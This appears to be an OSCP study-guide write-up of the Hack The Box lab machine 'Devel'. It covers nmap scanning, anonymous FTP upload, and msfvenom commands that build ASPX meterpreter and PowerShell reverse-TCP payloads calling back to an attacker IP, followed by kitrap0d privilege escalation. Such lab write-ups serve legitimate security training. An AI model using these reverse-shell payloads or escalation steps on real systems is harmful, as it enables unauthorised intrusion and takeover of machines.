Total OSCP GuidePayloads All The Things

Devel HTB

Enumeration

  • we use nmap to enumerate nmap -p- -A -T4 10.10.10.5

  • We found anonymous access in ftp

  • We found a website hosted on the IP (poor hygiene)

  • using dirbuster to bust the directories: We found nothing : (

FTP

We can anonymously login into ftp and upload files:** We can exploit this and use to our advantage

Exploitation

  • We can use this cheatsheat: https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom and use the ASP/x payload.

  • To output the ex.aspx file with the payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx > ex.aspx

  • we use msfconsole to listen on port 4444

  • upload to ftp by binary preferably.

  • WE GET A METERPRETER SHELL!!!! -

  • we can als0 use msfvenom -p windows/powershell/powershell_reverse_tcp LHOST=10.10.16.9 to gain access without metasploit.

  • We can use post exploit called suggester:

  • Post exploitation using kitrap0d for privilege escalation we got admin access

PreviousCerberus HTBNextEscape HTB

Last updated

Was this helpful?